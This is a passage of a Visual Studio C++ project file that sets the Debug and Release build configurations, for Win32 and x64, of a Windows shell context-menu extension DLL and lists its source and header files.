 42 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 43 |     <UseDebugLibraries>false</UseDebugLibraries>
 44 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 45 |     <CharacterSet>Unicode</CharacterSet>
 46 |     <PlatformToolset>v143</PlatformToolset>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>DynamicLibrary</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 52 |     <CharacterSet>Unicode</CharacterSet>
 53 |     <PlatformToolset>v143</PlatformToolset>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 59 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 60 |   </ImportGroup>
 61 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
 62 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 63 |   </ImportGroup>
 64 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 65 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 66 |   </ImportGroup>
 67 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
 68 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 69 |   </ImportGroup>
 70 |   <PropertyGroup Label="UserMacros" />
 71 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 72 |     <LinkIncremental>true</LinkIncremental>
 73 |     <IntDir>$(Configuration)\$(Platform)\</IntDir>
 74 |     <OutDir>$(SolutionDir)$(Configuration)\$(Platform)\</OutDir>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 77 |     <LinkIncremental>true</LinkIncremental>
 78 |     <OutDir>$(SolutionDir)$(Configuration)\$(Platform)\</OutDir>
 79 |     <IntDir>$(Configuration)\$(Platform)\</IntDir>
 80 |   </PropertyGroup>
 81 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 82 |     <LinkIncremental>false</LinkIncremental>
 83 |     <OutDir>$(SolutionDir)$(Configuration)\$(Platform)\</OutDir>
 84 |     <IntDir>$(Configuration)\$(Platform)\</IntDir>
 85 |   </PropertyGroup>
 86 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 87 |     <LinkIncremental>false</LinkIncremental>
 88 |     <OutDir>$(SolutionDir)$(Configuration)\$(Platform)\</OutDir>
 89 |     <IntDir>$(Configuration)\$(Platform)\</IntDir>
 90 |   </PropertyGroup>
 91 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 92 |     <ClCompile>
 93 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
 94 |       <WarningLevel>Level3</WarningLevel>
 95 |       <Optimization>Disabled</Optimization>
 96 |       <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CPPSHELLEXTCONTEXTMENUHANDLER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 97 |       <PrecompiledHeaderFile>
 98 |       </PrecompiledHeaderFile>
 99 |       <PrecompiledHeaderOutputFile>
100 |       </PrecompiledHeaderOutputFile>
101 |     </ClCompile>
102 |     <Link>
103 |       <SubSystem>Windows</SubSystem>
104 |       <GenerateDebugInformation>true</GenerateDebugInformation>
105 |       <ModuleDefinitionFile>GlobalExportFunctions.def</ModuleDefinitionFile>
106 |     </Link>
107 |   </ItemDefinitionGroup>
108 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
109 |     <ClCompile>
110 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
111 |       <WarningLevel>Level3</WarningLevel>
112 |       <Optimization>Disabled</Optimization>
113 |       <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CPPSHELLEXTCONTEXTMENUHANDLER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
114 |       <PrecompiledHeaderFile>
115 |       </PrecompiledHeaderFile>
116 |       <PrecompiledHeaderOutputFile>
117 |       </PrecompiledHeaderOutputFile>
118 |     </ClCompile>
119 |     <Link>
120 |       <SubSystem>Windows</SubSystem>
121 |       <GenerateDebugInformation>true</GenerateDebugInformation>
122 |       <ModuleDefinitionFile>GlobalExportFunctions.def</ModuleDefinitionFile>
123 |     </Link>
124 |   </ItemDefinitionGroup>
125 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
126 |     <ClCompile>
127 |       <WarningLevel>Level3</WarningLevel>
128 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
129 |       <Optimization>MaxSpeed</Optimization>
130 |       <FunctionLevelLinking>true</FunctionLevelLinking>
131 |       <IntrinsicFunctions>true</IntrinsicFunctions>
132 |       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CPPSHELLEXTCONTEXTMENUHANDLER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
133 |       <PrecompiledHeaderFile>
134 |       </PrecompiledHeaderFile>
135 |       <PrecompiledHeaderOutputFile>
136 |       </PrecompiledHeaderOutputFile>
137 |     </ClCompile>
138 |     <Link>
139 |       <SubSystem>Windows</SubSystem>
140 |       <GenerateDebugInformation>true</GenerateDebugInformation>
141 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
142 |       <OptimizeReferences>true</OptimizeReferences>
143 |       <ModuleDefinitionFile>GlobalExportFunctions.def</ModuleDefinitionFile>
144 |     </Link>
145 |   </ItemDefinitionGroup>
146 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
147 |     <ClCompile>
148 |       <WarningLevel>Level3</WarningLevel>
149 |       <PrecompiledHeader>NotUsing</PrecompiledHeader>
150 |       <Optimization>MaxSpeed</Optimization>
151 |       <FunctionLevelLinking>true</FunctionLevelLinking>
152 |       <IntrinsicFunctions>true</IntrinsicFunctions>
153 |       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CPPSHELLEXTCONTEXTMENUHANDLER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
154 |       <PrecompiledHeaderFile>
155 |       </PrecompiledHeaderFile>
156 |       <PrecompiledHeaderOutputFile>
157 |       </PrecompiledHeaderOutputFile>
158 |     </ClCompile>
159 |     <Link>
160 |       <SubSystem>Windows</SubSystem>
161 |       <GenerateDebugInformation>true</GenerateDebugInformation>
162 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
163 |       <OptimizeReferences>true</OptimizeReferences>
164 |       <ModuleDefinitionFile>GlobalExportFunctions.def</ModuleDefinitionFile>
165 |     </Link>
166 |   </ItemDefinitionGroup>
167 |   <ItemGroup>
168 |     <None Include="GlobalExportFunctions.def" />
169 |   </ItemGroup>
170 |   <ItemGroup>
171 |     <ClInclude Include="ClassFactory.h" />
172 |     <ClInclude Include="FileContextMenuExt.h" />
173 |     <ClInclude Include="Reg.h" />
174 |   </ItemGroup>
175 |   <ItemGroup>
176 |     <ClCompile Include="ClassFactory.cpp" />
177 |     <ClCompile Include="dllmain.cpp">
178 |       <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
179 |       <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
180 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
181 |       </PrecompiledHeader>
182 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
183 |       </PrecompiledHeader>
184 |       <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
185 |       <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
186 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
187 |       </PrecompiledHeader>
188 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
189 |       </PrecompiledHeader>
190 |     </ClCompile>
191 |     <ClCompile Include="FileContextMenuExt.cpp" />
192 |     <ClCompile Include="Reg.cpp" />
193 |   </ItemGroup>
194 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
195 |   <ImportGroup Label="ExtensionTargets">
196 |   </ImportGroup>
197 | </Project>


--------------------------------------------------------------------------------